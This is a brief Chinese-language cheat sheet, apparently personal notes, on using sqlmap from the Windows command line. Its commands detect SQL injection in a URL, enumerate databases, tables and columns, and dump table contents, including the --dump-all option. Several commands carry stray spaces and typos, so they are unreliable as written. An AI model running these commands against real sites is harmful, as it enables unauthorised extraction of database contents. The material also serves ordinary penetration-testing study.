安裝好sqlmap后,可以用cmd使用sqlmap
D:
cd sqlmap/sqlmap
python sqlmap.py -u……
常用語(yǔ)句
1.對(duì)url進(jìn)行檢測(cè), 判斷是否存在SQL注入
python sqlmap.py -u "URL" --batch
2.獲取數(shù)據(jù)庫(kù)
python sqlmap.py -u "URL" --dbs -- batch獲取全部數(shù)據(jù)庫(kù)
python sqlmap.py -u "URL" --current- db -- batch獲取當(dāng)前數(shù)據(jù)庫(kù)
3.獲取當(dāng)前數(shù)據(jù)庫(kù)里所有的表
python sqlmap.py -u "URL" -D db_ name --tables -- batch
4.獲取表的字段
python sqlmap.py -u "URL" -D db_ name -T table name --columns -- batch
5.dump字段內(nèi)容
python sqlmap.py -u "URL" -D db_ name-T table_ name -C "columns(,columns2)"l-dump --batch
如果字段內(nèi)容多的話(huà)可以再加上如--start 1 --stop 100這樣就取1-100條數(shù)據(jù)--dump可以換成--dump-all則導(dǎo)出全部的內(nèi)容